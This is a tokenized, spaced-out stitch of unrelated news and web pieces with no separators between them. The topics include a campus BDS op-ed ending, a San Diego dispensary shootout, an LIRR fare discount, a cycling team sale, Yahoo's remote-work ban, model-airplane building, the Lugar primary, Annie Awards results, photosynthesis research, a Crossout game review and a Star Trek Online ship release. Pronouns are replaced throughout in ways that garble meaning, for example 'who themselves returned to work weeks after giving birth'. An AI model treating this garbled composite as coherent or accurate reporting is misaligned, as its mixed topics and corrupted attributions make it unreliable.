In a statement that should be a model for other universities , Fordham Dean of Students Keith Eldredge explained , “ While students are encouraged to promote diverse political points of view , and we encourage conversation and debate on all topics , I can not support an organization whose sole purpose is advocating political goals of a specific group , and against a specific country – ( Israel ) . ”
They added , “ The call for Boycott , Divestment and Sanctions of Israel presents a barrier to open dialogue and mutual learning and understanding . ”
First Amendment advocates may object to banning hate speech . Let them . It did n't stop Oklahoma from expelling students for singing a racist song . If , however , antisemitism is protected speech , then no university should be allowed to prevent other forms of offensive speech by anyone on campus . The Constitution will not win that confrontation .
For too long , universities have been the one place in America where antisemitism is tolerated . It is time that university officials respect Jews ' right to “ define our own oppression . ”
Dr. Mitchell Bard is the author/editor of 24 books including the 2017 edition of Myths and Facts : A Guide to the Arab-Israeli Conflict , The Arab Lobby , and the novel , After Anatevka : Tevye in Palestine .
SAN DIEGO — An attempted holdup at a North Park medical marijuana dispensary erupted in gunfire Friday , leaving a security guard wounded and a suspected robber dead , authorities reported .
The shootout at the shop on Ray Street occurred shortly before 12:30 p.m. , according to San Diego police .
“ They attempted to rob the dispensary at gunpoint , ” said Lt. Manuel Del Toro .
Del Toro said the suspects walked into the store guns drawn .
“ They were attempting to steal marijuana. ” said Lt. Del Toro . “ They did hold up the marijuana dispensary at gunpoint and there was a shooting that went on inside of the marijuana dispensary . ”
The gun battle between the suspects and a security guard . One of the suspects died on scene and the other one fled . The security guard was wounded and taken to the hospital . They are in stable condition .
“ I heard boom and then saw the cop car come going after them , ” said Nicole Dodson .
Dodson was at home eating lunch at their apartment when they heard a loud screech and then a crashing sound .
“ I came out and I saw the fence was just destroyed , ” said Dodson as they showed Fox 5 the fence next door . “ The guy was parked right next to my car . They took off down the alley . ”
“ We were driving down the street and I saw this guy , they just comes running , ” said Kevin London .
London actually saw the suspect after they fled the dispensary .
“ He had like a pretty worn duffle bag , they were running like they were in a really big hurry . They ran past my car and cut through the alley , quick , ” said London .
Police are now searching for the suspect . Investigators have very little to work with . They are described as a black male driving a white sedan , possibly a Mercedes .
Police told Fox 5 the dispensary is operating illegally , but it will not affect their investigation .
Dodson said it was one of several dispensaries that have moved into their neighborhood . They said she 's not against medical marijuana , but this type of business does bring concern .
“ It 's scary because it 's a cash only business and that 's kind of why they probably targeted that place , ” said Dodson .
The Metropolitan Transportation Authority ( MTA ) today responded to Governor Andrew M. Cuomo 's call for a discount for Long Island Rail Road riders as a result of Amtrak 's summer service cuts at Penn Station . The Long Island Rail Road will offer on average , a 25 % fare reduction for all passengers traveling to Hunterspoint Avenue and Atlantic Terminal during Amtrak 's repair work . The discounts apply to all passengers traveling to Atlantic Terminal and Hunterspoint Avenue - including those on trains diverted to these stations from Penn Station . All LIRR riders will be given a free transfer during the morning rush to New York City subways at Atlantic Terminal and Hunterspoint Avenue which have direct and easy connections to multiple subway lines . The reductions – which are based on the distance passengers are traveling – will be in effect from July 10 to the completion of Amtrak repair work .
The discount will apply to monthly , weekly and daily tickets . Starting today , Tuesday , June 20 , the discounted monthly tickets will be available via ticket windows , ticket vending machines and mail and ride . Discounted tickets will be available via MTA eTix starting on July 1 .
“ Governor Cuomo has asked us to provide greater value to our customers while Amtrak conducts repairs this summer . In response we 're adding to the mitigation measures we 've already announced by providing a discount that will give customers who travel to key transportation hubs an average discount of 25 % , ” said MTA Interim Director Ronnie Hakim . “ We believe that this move will mitigate the inconvenience that our customers may experience , and have the added benefit of drawing customers away from Penn Station while Amtrak performs repair work . ”
The discount will also be available to customers traveling to Long Island City , Nostrand Avenue and East New York .
The discounted fares are in addition to the previously released transportation plan that restores rush-hour commuter capacity to and from Manhattan , and alleviates anticipated delays and disruptions for LIRR commuters ( link : http : //nymta.civicconnect.com/LIRR-PennStation ) .
Free Subways Transfers During Morning Rush
As previously announced , LIRR ticket holders who take trains to Atlantic Terminal , Jamaica , and Hunterspoint Avenue will also be able to transfer to the subway for free during the morning rush hours .
At Atlantic Terminal riders will be able to use the .
At Hunterspoint Avenue riders will be able to use the .
At Jamaica riders will be able to use the .
Customer Outreach
The MTA is alerting customers to the discount through a wide range of platforms , including e-mails alerts ; Twitter messages ; Facebook posts ; electronic signs located in outlying stations ; electronic message boards located in key terminals , including Penn Station , Jamaica Station and Atlantic Terminal ; messaging on the Train Time app . In addition ticket clerks will alert customers to the discount at ticket windows .
Mail and Ride customers will receive an email letting them know that they can return unused mail and ride tickets for a full credit by simply placing the unused tickets in the return envelope , and placing it in Mail and Ride drop box at Penn Station , Atlantic Terminal or Jamaica Station . They can then purchase a discounted ticket to Atlantic Terminal or Hunterspoint Avenue at a ticket window or a ticket vending machine .
Flavio Becca is set to sell their WorldTour licence to Trek , who will create a new team structure for 2014 that is expected to be built around Fabian Cancellara and Andy Schleck , according to Luxembourg newspaper Tageblatt . The newspaper suggests that Becca will cancel Fränk Schleck 's contract due to their positive anti-doping test for Xipamide during last year 's Tour de France and that the future of the Leopard Trek development team is uncertain . Related Articles Report : RadioShack to end team sponsorship
Cancellara wins their third Paris-Roubaix
Schleck gets feisty in Tour of California breakaway
Cancellara uncertain over Tour de France participation
Fränk Schleck hit by car while training
Trek set to take title sponsorship role at RadioShack-Leopard in 2014
Becca did not reply to calls from Cyclingnews and has so far refused to discuss their plans for the team .
Cyclingnews reported at the end of the Giro d'Italia that negotiations with Becca to take over the team were underway . RadioShack announced earlier that it would end its sponsorship at the end of this season . Luca Guercilena replaced Johan Bruyneel as team manager after the Belgian 's close links with Lance Armstrong were revealed in detail by the USADA doping investigation .
Trek has a contract with the team for 2014 but would need to secure Becca 's WorldTour licence if it wants any current contracts with riders to be valid .
Cancellara 's contract expires at the end of this year , but Tageblatt claims that they would stay with the team . Trek is said to have promised to build the team around them for the Classics . Andy Schleck is assured a place in the team because their contract runs through 2014 , but things look difficult for their older brother Fränk . The newspaper said that they would not be on the team next year , and it is possible that Becca could fire them when they return from their ban , if not before .
Image caption What your colleagues think you 're doing when working from home
Yahoo has banned its staff from `` remote '' working . After years of many predicting working from home as the future for everybody , why is it not the norm ?
When a memo from human resources dropped into the inbox of Yahoo staff banning them from working from home it prompted anger from many of its recipients .
`` Some of the best decisions and insights come from hallway and cafeteria discussions , meeting new people , and impromptu team meetings , '' the memo said .
`` Speed and quality are often sacrificed when we work from home . ''
The move to get staff back into the office from June this year is thought to have been driven by new chief executive Marissa Mayer , who themselves returned to work weeks after giving birth .
How many people telecommute at Google ? Our answer is : As few as possible Google chief finance officer Patrick Pichette
Virgin entrepreneur Richard Branson , who spends much of their time working on Necker Island in the Caribbean , was quick to respond , calling it a `` backwards step in an age when remote working is easier and more effective than ever '' .
People in the West are constantly bombarded by news about technology that makes it easier to communicate with the office . Many have fast broadband and webcams that allow their faces to appear through the ether at any important meetings . They are surrounded by smartphones , laptops and tablets .
Everything is surely there to free them from the daily commute . Those in manufacturing or retail might always have to be present , but in an age when so many work in offices , why ca n't they have their office space at home ?
What is telecommuting ? Use of personal computers and phones to enable a person to work from home while maintaining contact with customers or a central office
Also known as teleworking , remote working and working from home
TUC figures show it 's most common among older people , with one in five workers aged over 55 regularly working from home
Full-time workers more likely to do it than part-timers , and those with dependent children , says the Work Foundation
Number of countries encourage it to help employees ' work/life balance
But some work five to seven more hours a week at home than if in a regular office setting , a recent University of Texas study shows
There are signs that the number of people working from home is on the increase in the UK , according to the CBI . A total of 59 % of employers who responded to a survey in 2011 were offering teleworking , up from 13 % in 2006 .
In the US , 24 % of employed people report working from home at least some hours each week , according to the Bureau of Labour Statistics .
But only 2.5 % of the workforce ( 3.1 million people , not including the self employed or unpaid volunteers ) consider home their primary place of work , says the Telework Research Network .
Yahoo is not a lone voice in espousing the virtues of physically being in the office .
Only last week Google 's chief financial officer Patrick Pichette said when the company is asked how many people telecommute , their answer is `` as few as possible '' .
`` There is something magical about sharing meals , '' Pichette explained . `` There is something magical about spending the time together , about noodling on ideas , about asking at the computer 'What do you think of this ? ' ''
Google workers are provided with a free wifi-enabled bus in to the HQ . Mayer , of course , is a former Google executive .
There are obvious reasons why working from home has not proliferated in the way people thought it might . There is still ingrained cultural antipathy .
Image caption Google , like Yahoo , prefers its workers in the office
Not `` being seen in the office '' may affect a person 's chances of promotion , result in a smaller pay rise than office-based peers and lower performance evaluations , according to research by the London Business School and the University of California .
They stress the continuing importance of so-called `` passive face time '' that is being in the office , regardless of what someone is doing .
Face time from afar A London Business School/University of California study found remote workers may get smaller pay rises and fewer promotions . These tactics may help : regular phone or email status reports , especially first thing or end of the day
being extra-visible when in the office
responding immediately to emails
The additional pressure not to be perceived as `` skiving '' may drive those who do work from home to exceed their hours .
Prof Jennifer Glass , co-author of a report on the US workforce published by the University of Texas at Austin , says for many people , especially those in their 30s and 40s , teleworking is part of their work after they have already done 40 hours in the office .
Glass was `` flabbergasted '' by the Yahoo memo . `` This seems to be trying to bring Yahoo in line with corporate America , not high-tech industries , '' they say .
`` The idea that this is going to promote more innovation seems bizarre . ''
Promoting the value of interactions in hallways and canteen seems strange at a time when face-to-face contact within the office is decreasing .
`` I frequently email someone without getting up to see if they are there , '' Glass notes .
Managers can be biased in favour of those they can actually see working .
`` There is this attitude that managers need to see people are close by and that those workers are more productive , '' says Glass . `` It is a natural tendency to want to control things . ''
Image caption One perk of teleworking is no more commuting
This seems outdated to many . `` The best employers do n't overlook staff because they are not in the office . That strikes me as yesterday 's way of working , '' says Paul Sellers , policy adviser at UK trade union umbrella group the TUC .
Dame Stephanie Shirley , who pioneered home working in the computer industry in the early 1960s , says the concept has not taken off in quite the way many predicted at the time .
`` Academics were predicting it would become more acceptable . Town planners were starting to incorporate the idea of home working into their designs . It felt like the beginning of a different kind of society . ''
Extracts of the leaked memo To become the absolute best place to work , communication and collaboration will be important , so we need to be working side-by-side . Speed and quality are often sacrificed when we work from home . We need to be one Yahoo ! , and that starts with physically being together . Being a Yahoo is n't just about your day-to-day job , it is about the interactions and experiences that are only possible in our offices . And , for the rest of us who occasionally have to stay home for the cable guy , please use your best judgment in the spirit of collaboration . Read the full memo
When they started their company F International in 1962 , the idea of people working from home was alien to most businesses . Offices were highly regimented . Some of the company 's programmers did not even have home telephones .
Workers were used to signing in and having their output closely supervised . `` It was about the time you were present , rather than what you had achieved , '' says Dame Stephanie .
By the mid-1980s F International was a pioneer of teleworking employing 800 home workers and turning over nearly £20m a year , and was setting up a national electronic mail network to link workers ' home computers to the company 's minimal headquarters .
Dame Stephanie said they were on a `` crusade '' to find skilled work for women who had left the workplace to start families or look after relatives .
But social changes can take longer than expected , says the 75-year-old , who quit the industry in 1993 .
Decades later the issue has not gone away . Working from home still has its image problem .
London Mayor Boris Johnson once joked : 'We all know that is basically sitting wondering whether to go down to the fridge to hack off that bit of cheese before checking your emails again . ''
For Alan Denbigh , co-author of The Teleworking Handbook and former executive director of the Telework Association , there are proven benefits of home working . `` It gives you the opportunity to get on with a particular project and for those who are bringing up small families where it is imperative to have a degree of flexibility it works . ''
Having done both they do not recommend working from home exclusively , recognising the benefits of interacting with people in the office and the pitfalls of working long hours at home to keep up .
But they say it is `` equally ridiculous '' to feel you have to be at the office every day . They recommend a bit of both .
`` A large corporation saying you ca n't work at home , especially an IT based company , seems counter-productive . You have to treat people as grown-ups . ''
Additional reporting by Brian Wheeler
You can follow the Magazine on Twitter and on Facebook
Welcome to Model Airplane Building !
Learn to Build a Realistic Plastic Airplane Model
So you 've decided to build a plastic model airplane . Welcome to an absorbing and fun-filled hobby ! Nothing quite captures the imagination as airplanes locked in battle high in the sky . This hobby is a great way to re-live an important period of world history , or to spend time with kids building patience and hand-eye coordination .
Above : Spitfire Mark Vb ( 1/48 scale ) .
Plastic model kits are designed with a tremendous amount of accuracy and detail . The kit format allows you to fully customize your model . If there is a veteran in your life , presenting a model of that person 's service aircraft will be the gift of a lifetime .
You may have already built or partially built a model , and have mentally compared it to the ones you see on display at the hobby shop . You are wondering how they make the kits turn out so amazingly realistic ! Some of your questions might be :
1 ) How do they get rid of the gap between the body halves ?
2 ) How do they get the paint to look so smooth ?
3 ) How do they get the small details to stand out instead of disappear ?
Above : P-51D Mustang ( 1/48 scale ) . Click the image and turn on your speakers for a short video ( 1.6 MB ) .
This site is intended to answer these and many more questions . We 'll demonstrate building the typical World War 2 Airplane Model from start to finish .
Begin at the top of the menu at the left and proceed downwards .
You will learn many of the insider tricks that are used to turn a humble box of molded plastic parts into a museum-worthy masterpiece .
You can use as few or as many of these tricks as you like to improve your models . But the most important thing is to have fun doing it !
Send us your comments below ! Login with your Facebook , Twitter , Google or Yahoo account .
Please enable JavaScript to view the comments powered by Disqus .
May 8 , 2012
After years of bipartisan policymaking , veteran lawmaker Senator Richard Lugar ( R-IN ) is expected to go down in defeat in their primary election today . With the likely defeat of Lugar , political observers are sure to start speculating over the meaning of the election . Is it a rebound for the Tea Party ? Is bipartisanship dead ? Was Richard Mourdock , Lugar 's opponent , unpatriotic for deceitfully smearing Lugar for working with Obama to secure loose nuclear weapons ?
These are legitimate questions .
But it 's worth noting that a primary factor in Lugar 's desperate fight for reelection stems from the power of banking lobbyists . The Indiana Republican can be viewed as a demonstration of Wall Street 's political muscle . In the words of Politico , “ The banking industry is making an example of Sen. Dick Lugar . ”
In a rare loss for Wall Street , the Senate last year rejected legislation to delay a rule to limit the amount banks can charge businesses for credit card swipe fees . The financial industry mounted an incredible lobbying campaign — as Bloomberg reported , banks hired high priced K Street hacks , used conservative blogs like RedState , and developed Beltway advertising — to pass the measure . But a coalition of big box retailers , like Wal-Mart and Target , along with small businesses and other vendors , persuaded enough legislators from both sides of the aisle to kill the measure and limit the fees . The rule affected some $ 16 billion in bank profits .
Lugar was among the few Republican senators up for reelection in 2012 to vote against the banks . As Anna Palmer and Robin Bravender reported , bank lobbyists decided early on to use the Indiana primary today to make an example out of Lugar :
Financial Services Roundtable 's Scott Talbott , Lisa Nelson of Visa , Peter Blocklin of the American Bankers Association and Vincent Randazzo of PNC hosted an inside-the-Beltway fundraiser for Lugar 's opponent , Richard Mourdock , this week . The Electronic Payments Coalition , which represents the industry , also sent out an email fundraising blast that included the event . [ … ] The ABA supported Mourdock on June 23 — soon after the Senate vote on the swipe fee amendment — sending them a $ 5,000 check , according to federal campaign filings . [ … ] “ There are just a lot of sour grapes out there , ” said a GOP financial services industry lobbyist . But with more battles over swipe fees on the horizon , bankers want to make it clear that there will be consequences for Republicans who vote against them .
Lugar has also been pummeled by front groups tied to the financial services industry . The Club for Growth , which is funded by several highly ideological hedge fund managers and investors , has aired numerous attack ads against the senator . FreedomWorks , run by Dick Armey , who served as a bank lobbyist after retiring from Congress and C. Boyden Grey , a current lobbyist working to chip away at Dodd-Frank , also ran anti-Lugar ads .
While Mourdock has campaigned as an insurgent Tea Party candidate , they have n't shied away from big bank support . And was Lugar 's vote against the banks motivated by conviction ? Lugar 's daughter worked as a top lobbyist for a retail industry group that supports the credit card swipe fee cap . Few candidates ever admit that their own races are really proxy battles for powerful corporations .
In all fairness , though Lugar faces a torrent of financial lobbyist opposition , much of K Street still supports him . A list of recent fundraisers published by the Sunlight Foundation 's Party Time blog reveals that Lugar steadily raised campaign cash from corporate lobbyists nearly every month since last year .
The overwhelming campaign cash mustered by Wall Street , however , seems likely to take down Lugar in the election tonight . It 's no wonder so few legislators stand up to the big banks .
Michael Dudok de Wit and Studio Ghibli 's The Red Turtle received the Best Animated Feature - Independent award at the 44th Annual Annie Awards on Saturday . Production I.G 's Miss Hokusai , Makoto Shinkai 's Your Name. , Long Way North , and My Life As A Zucchini were also nominated in category .
Shinkai and de Wit were both nominated for Outstanding Achievement , Directing in an Animated Feature Production for their respective films . The directing award went to Zootopia .
The Red Turtle was also nominated for Outstanding Achievement , Animated Effects in an Animated Production . Composer Laurent Perez del Mar was nominated for Outstanding Achievement , Music in an Animated Feature Production , while writer Pascale Ferran was nominated for Outstanding Achievement , Writing in an Animated Feature Production . The animated effects award went to Moana , the music award went to The Little Prince , and the writing award went to Zootopia .
DreamWorks and Netflix 's Voltron Legendary Defender animated series was nominated in the Best Animated Television/Broadcast Production For Children category for its episode `` Return of the Gladiator . '' The award went to Adventure Time .
No anime were nominated for the main Best Animated Feature category , and Zootopia received the award . Studio Laika 's Japanese-themed Kubo and the Two Strings was nominated for the award . The film won Outstanding Achievement awards in the editorial , character animation , and production design categories . It was also nominated for animated effects , character design , directing , storyboarding , voice acting , and writing .
Director Mamoru Oshii ( Patlabor , Ghost in the Shell , Sky Crawlers ) received the Winsor McCay Award for career contributions to the art of animation . They accepted the award in person . Studio Ghibli co-founder Isao Takahata received the award last year .
ASIFA-Hollywood added the Best Animated Feature-Independent award in 2015 in order to `` recognize not only features in wide release , but also the independent animators , international studios , anime and special productions that might not otherwise get the attention they deserve . '' Studio Ghibli 's When Marnie Was There and Mamoru Hosoda 's The Boy and The Beast films were nominated for the award last year but did not win .
Two new initiatives at the University of Cambridge aim to address the growing demand on the Earth 's resources for food and fuel by improving the process of photosynthesis .
As part of a new collaboration , the scientists have been awarded the major component of a $ 4M initiative to improve the process of photosynthesis , which allows biological systems to convert sunlight into food and is also the source of fossil fuels .
Four transatlantic research teams - two of which include academics from Cambridge 's Department of Plant Sciences - will explore ways to overcome limitations in photosynthesis which could then lead to ways of significantly increasing the yield of important crops for food production or sustainable bioenergy .
Professor Howard Griffiths from the Department of Plant Sciences said : “ Plants really matter , and for the next generation , plant and microbial productivity will become the focus of key global issues : the basis for feeding an additional 2-3 billion mouths , to drive forward an economy currently trading on past sunlight , and maintain biodiversity in the face of climate change . ”
The funding has been awarded by the UK Biotechnology and Biological Sciences Research Council ( BBSRC ) and the US National Science Foundation ( NSF ) in a pioneering undertaking for the best minds from the USA and UK to join forces to explore this important research .
Despite the fact that photosynthesis is the basis of energy capture from the sun in plants , algae and other organisms , it has some fundamental limitations . There are trade-offs in nature which mean that photosynthesis is not as efficient as it could be - for many important crops such as wheat , barley , potatoes and sugar beet , the theoretical maximum is only 5 % , depending on how it is measured . There is scope to improve it for processes useful to us , for example increasing the amount of food crop or energy biomass a plant can produce from the same amount of sunlight .
Some of the research will focus on improving a reaction driven by an enzyme called Rubisco , which is a widely recognised bottleneck in the photosynthesis pathway . By attempting to transfer parts from algae and bacteria into plants , the researchers hope to make the environment in the plants ' cells around Rubisco richer in carbon dioxide which will allow photosynthesis to produce sugars more efficiently .
Professor Griffiths added : “ The enzymatic powerhouse Rubisco takes carbon dioxide from the atmosphere and uses light energy to produce sugars and other building blocks of life . However , the enzyme is rather flawed and somewhat promiscuous : it engages with oxygen as well as carbon dioxide , to the detriment of potential plant productivity .
“ Some plants have evolved mechanisms , which act like biological turbochargers , to concentrate CO2 around Rubisco and improve the enzyme 's operating efficiency . These carbon concentrating mechanisms have evolved in certain key crops , such as sugar cane and maize . Other plants , such as aquatic algae , have developed mechanism in parallel which actively concentrate bicarbonate as a source of CO2 for Rubisco . ”
The research projects have been funded by BBSRC and NSF following a multidisciplinary workshop held by the funders in California in September 2010 . The workshop , called the Ideas Lab , enabled scientists from different disciplines and institutions in the UK and USA to explore ideas and potential projects before submitting them to BBSRC and NSF .
The Ideas Lab experience was likened by Professor Griffiths to be a combination of Big Brother , The Weakest Link and The Apprentice . Professor Griffiths is the consortium leader for one of the joint proposals funded , which will be exploring the operation of an algal carbon concentrating mechanism , and the possibility for introducing components into higher plant cells .
Dr Julian Hibberd from the Department of Plant Sciences is part of one of the other initiatives which is seeking to increase the efficiency of light harvesting by broadening the wavelengths of light , as used by bacteria , to power biophysical transport processes in higher plants .
This research will consolidate a major Plant Sciences initiative at Cambridge , which is exploring the means to improve photosynthesis from the perspective of sustainable plant productivity and crop yields for the future . Additional work is also being undertaken by Dr Hibberd to investigate the potential introduction of C4 photosynthetic traits into crops such as rice . This programme is part of a broader sweep of strategic research relevant to sustainable crop development , involving RNAi , pathogen suppression and epidemiological controls to maintain yields in a changing climate .
Every week we dispatch Brendan to scour the post-apocalyptic wastes of early access and scavenge whatever games they can find . This week , they return with multiplayer car combat game Crossout [ official site ] .
Crossout is an action game about building a terrifying car made out of swords and skulls and then driving around the wasteland , pumping other drivers full of lead . It has a soundtrack made up of gentle guitar .
That was only the first thing I noticed when I dropped into the workshop menu of this multiplayer scrapper from Targem Games . It was odd . It felt like the folksy strumming did n't belong in this high-octane rampage . By the time I left the deserts and shipyards of Crossout , I would be impressed but also impossibly frustrated . The music would n't be the only thing I would consider completely out of place .
You start out in the garage . Here is your car , it is a level 1 piece of rusty garbage . Enter a battle and win to collect experience and rewards ( eg . car parts ) . These 8v8 battles take place across wide maps scattered with remnants of the old world – rusty ships , abandoned factories and so on . Sometimes they ask you to capture the enemy HQ ( a giant circle outlined on the ground ) and sometimes to capture a neutral zone in the middle . You can win this way or by getting the most kills by the time the clock runs out . You only have a few minutes for each battle .
The combat , once you unlock a few new guns ( shotguns , powerful cannons , etc ) is all sorts of Mad Max silliness . You rev around blasting parts of enemy cars away while trying to make sure your own bits do n't get shot off . It 's possible for all your turrets to get shredded off your hood , leaving you helpless . Sometimes your enemies will blast the wheels right off your vehicle , and while a three-wheeled war-truck still has a decent bit of control to it , a car with two wheels missing on the front is a useless metal corpse , one that can do nothing but fire impotently at passing targets in some vain attempt to keep fighting . The piecemeal destruction of both enemies and yourself can be astounding fun .
Unfortunately , you wo n't be meeting too many other players until you reach level 10 . Occasionally a human or two will show up in your battles but mostly you will be fighting bots alongside other friendly bots . They are as dumb as you might expect sentient trucks to be . Not only do they drive into walls or off ledges with alarming frequency , they also enjoy getting in your way more than anything in the world . They 're an absolute nightmare .
When another human opponent does show up , you normally end up heading straight for them because they 're the only real threat . And they will often grant you the same courtesy , sniping you with a cannon from 500 metres away , the skilled jerks . When you get the upper hand , however , there 's a ton of satisfaction to be had in dismantling another player 's vehicle piece by piece . Bam , there goes their machine gun . Bam , now their left tire . Bam , their right tire . Bam , there goes the engine . Twice I surgically removed all the parts from players ' cars except for the chassis , then stopped firing and left the area without even killing them . It feels so good to know they are just sitting there , waiting for some idiot bot to come along and kill them . But human players do present their own problems during a battle , bringing a degree of creativity with their vehicles that can throw you off or leave you burning in the dust .
The combat is fun but it not where the real promise lies . That would be the workshop . This is where you make your car , clicking together parts using a sort-of 3D grid system . The practice of plonking parts on and plucking them off is granted with an easy-to-use build mode . You can stick stuff together in a huge variety of ways . Do you want to make your car entirely out of flimsy steel frames with only a single enormous cannon on top ? Go ahead . What about a tin-plated , eight-wheeled tank fitted with dual shotguns and spikes on the front for ramming ? Knock yourself out . Later upgrades let you add rockets , stealth fields or giant grinders . Some objects – skulls , headlamps , spears , exhaust pipes – are just for style purposes but even these give you a boost to XP earned while in a fight . This is great because if you have some ‘ space ' left on your car , it encourages you to dress up your deathmobile in ridiculous ways .
There 's also an exhibition tab which lets you see other players ' creations and many of these are fantastic . As war machines , most of them are functionally useless . But as creations they are hilarious . Sadly , you 'll need all the ‘ pieces ' to download and use one of these vehicles in battle . But you can take any of them for a test drive , which only adds to the playfulness of the creation menus . For example , I found one which was a wobbling stack of rockets and suddenly lurches into a vertical position whenever you brake . At this point you can fire the rockets and you will blast off into the sky . A great position from which to launch the missiles housed in the chassis .
Put this editor together with the rampant combat and you 're left with a rough and tumble action game with tons of potential . It 's wonderful . It 's creative and brainless . It 's Besiege meets World of Tanks .
It 's also one of the grubbiest grindfests I have ever had to play . And this is where Crossout starts to fall apart .
Like I said , the option to enter a human-only free-for-all does n't open until you reach level 10 . This sounds like a short trip up the XP ladder but turns out to be a thankless trudge through quicksand . There are four computer ‘ factions ' each offering their own special pre-built death machines as rewards for leveling up but these too are n't available until level 10 . Likewise , the core game soon becomes mired in half-baked crafting mechanics . Creating new and dangerous machines is heavily limited in the beginning both by what pieces you can earn in battles but also by your level . At level 8 you will be able to put more pieces on your car than at level 5 , for example .
At the beginning , you can get a lot of joy from unlocking new components – tin armour , tractor wheels , spiky plough bumpers . Initially the limits placed on you force you to get creative . How can I attach this giant spike to the front of my machine without going over the piece limit ? How best should I combine these guns to make the most of the power usage limit ? It 's the inviting puzzle of a post-apocalyptic mechanic . But as things go on and new pieces refuse to make themselves known for longer and longer periods of time , the grind for improvement becomes noticeably unpleasant . And look , who 's that coming over the dusty horizon ? Why , it 's Unpleasant Grind 's best friend , Microtransactions .
When I said that this game shared some DNA with World of Tanks , I really meant it . All the microtransaction guff visible in Wargaming 's endless WWII deathmatching is also visible here , right down to the large sums of money for bundles containing big ol ' monster vehicles ( one bundle charges as much as 60 dollars for a single tank and all its parts ) . What 's worse , all the game 's systems – the market , the crafting benches , the editor – form a kind of mechanical cartel which reinforces a dull grind , only avoidable by investing a sickening sum of real money for some fake coins . While this might be forgivable in a free-to-play game like World of Tanks , it is repugnant to see in an early access title which already costs £25 in the first place ( and this is actually a point of confusion , since their website describes it as “ free-to-play ” ) .
When I say the systems work as a cartel , that might not fully explain things . Let 's take a gander at the game 's crafting system and see what I mean . In the beginning you can manufacture guns , engines and so on with a handful of scrap which you earn in battles . But to craft newer , more powerful items , you will need copper , another thing to grind for and one which only appears in a different ‘ type ' of battle . And after that you need wires , which you earn in another type of battle . And after that , electronics from another type of battle . Here 's what that menu looks like .
“ Get wires ! ” it demands . “ Get scrap ! Get the chassis ! ” Rather than having a single currency or rewarding you with all things at once , it posts these battles – all of which are identical – composing a list of samey , grindy “ quests ” . All I want is to build a silly car and shoot people with it . Please , game . Please .
Not only will you need to collect all these items , plus some other necessary pieces , you 'll also need to “ rent ” a workbench for in-game credits . 25 credits will let you craft 5 parts ( guns , etc ) for example . You can get these credits by selling other guns , engine parts , radiators , and stuff you do n't need , on the market . Got all that ? Okay , go ahead and press the craft button . Now wait several hours until your piece is completed .
If all that sounds annoying , do n't worry , you can just buy the thing you want on the same player-run market . But you 'll need those in-game credits again . The most expensive cannon in the game currently costs 22000 credits . If you were to buy these credits from the game 's store , rather than slowly ( very slowly ) accumulating them through selling item after item , it would cost you $ 294 . I have n't even mentioned ‘ fuel ' or ‘ coupons ' or ‘ fusion ' yet ( I wo n't ) .
As you can see , there are a host of irritating prerequisites to fulfill before you can even properly use this obtuse system of crafting . The whole interface is a mess of parts , currencies , copper , coupons , wires , electronics . It 's an over-complicated mish-mash – a huge disappointment when you consider the fun you could be having if the game just simplified all this . How easy it could have been to have two things – car parts and scrap . Or , even simpler : new catalogues of parts tied to each level .
But that would benefit the player , not the microtransaction gods . I can not emphasise enough how much of a shame this is , because the actual game buried underneath all this nightmarish grind-goop is excellent . Build a weird apocalypse car and go to war in it ? Yes , please ! If only you could make things like those shown in the exhibition tab without jumping through all these disgusting hoops . Some hoops ? Fine . But not these hoops . These hoops are rotten . If the system of progression was designed like any other fully-paid game I would be screaming at people to play Crossout . It 's not . It 's designed to be a drag . As a result it becomes a rip-off , either in time or money .
Many folks will be able to overlook This niggles and the interminable grind . It 's also possible the rate of progression will be reworked . But for me it is currently like traipsing through a bog , and the sheer grubbiness of all the menus does n't give me much hope . A horrible thing to have to say , because the wasted potential here is astounding . It 's like someone took all the joy and creativity of Besiege and made it competitive ( again , what a great idea ) but then they soaked it in grind , leveling , bad AI , icky microtransaction bait and then – consulting no-one – slapped a full-price tag of 25 quid on it . A big disappointment to see so many unforgivable flaws in such a wonderful game , where they simply do n't belong .
Crossout is on Steam for £24.99/ $ 29.99 . These impressions were based on build 1332430
Modern starship engineers are continually in search of the perfect design , constantly tweaking and improving on existing concepts , while also inspiring new technology to solve the barrage of unknown scenarios constantly encountered at the edges of known space . We 're pleased to announce the impending release of the Miracle Worker Ship Megabundle – the latest ingenious designs in cutting-edge starship technology will soon be at the fingertips of captains of all factions in Star Trek Online .
Click on the right side of the image to scroll through the gallery below and see all the new ships !
Federation , Klingon Empire , and Romulan Republic shipyards will each be producing their own variants of these formidable new ships , each combining the strengths of existing Cruisers and Warbirds with new and improved functionality that will be the standard for any future Miracle Worker starships . Here are the most noteworthy of those features :
Additional Base Subsystem Bonuses While nearly all Tier 6 Starships come with a total of +20 Subsystem Power these days , Miracle Worker ships will have a total of +30 Subsystem Power spread across all four Subsystems ( Weapons , Shield , Engines , Auxiliary )
Improved Sector Space Travel Advances in Slipstream technology will allow these vessels to travel faster , and for longer , while at Transwarp Speeds in Sector Space .
Universal Console Slot All Miracle Worker vessels will be fitted with a versatile Console equipment slot which can hold any Engineering , Science , Tactical , or Universal console . This is an additional Console slot , above and beyond the standard allotment for ships of the same Tier .
“ Innovation ” Ship Mechanic This innate ability represents the ingenuity and quick-thinking of the Miracle Worker Captain Specialization , and their expert crew , coming up with strange and outside-the-box solutions to combat situations . It will be discussed in greater detail below .
As an additional design detail worth noting , this will be the first time a Klingon-designed vessel will be a “ true ” Cruiser , including access to all four Cruiser Commands . The Romulan Republic has chosen to stick with Singularity Warp Cores and Singularity functionality , so will be classified as a Warbird .
These starships will soon be available in the C-Store and can be purchased by level 50 players ( Vice Admiral and Lieutenant General ranks ) . All three factions share the same three Universal Consoles and Starship Traits with variants from the other factions .
Miracle Worker Ship Mechanic : Innovation
Miracle Worker vessels have access to the Innovation mechanic , which reflects the ingenious solutions you and your crew can pull out of thin air to aid in difficult situations .
This mechanic will be represented by a new UI element that will appear on the players ' viewscreen while piloting any Miracle Worker starship . It is comprised of two primary elements :
1 ) Ability Sequence Requirements
These are represented as a series of Blue , Red , and Gold lights , corresponding to Science , Tactical , and Engineering abilities respectively . This informs the player which profession 's Bridge Officer abilities need to be used in order to trigger the Innovation Effect .
Ability Sequence Requirements are randomized each time the mechanic refreshes , and individual requirements may be doubled , or tripled . As a few examples , valid sequences can be :
Engineering , Science , Tactical
Science , Science , Engineering
Tactical , Tactical , Tactical
Players may activate the required Bridge Officer Abilities in any order to satisfy the sequence . As soon as the third and final ability requirement is satisfied , the Innovation Effect will immediately trigger ( as long as you are in Combat ) .
2 ) Innovation Effect
One of six possible Innovation Effects will be randomly selected each time the Innovation Mechanic refreshes .
